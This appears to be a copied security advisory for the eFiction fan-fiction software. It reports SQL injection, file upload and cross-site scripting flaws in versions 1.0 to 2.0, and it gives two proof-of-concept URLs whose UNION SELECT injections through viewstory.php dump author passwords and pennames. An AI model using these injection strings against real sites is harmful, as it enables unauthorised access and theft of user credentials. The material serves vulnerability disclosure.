10 lines
No EOL
780 B
Text
10 lines
No EOL
780 B
Text
source: https://www.securityfocus.com/bid/15568/info
|
|
|
|
eFiction is prone to SQL injection, remote file upload, and cross site scripting vulnerabilities.
|
|
|
|
These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.
|
|
|
|
eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
|
|
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/* |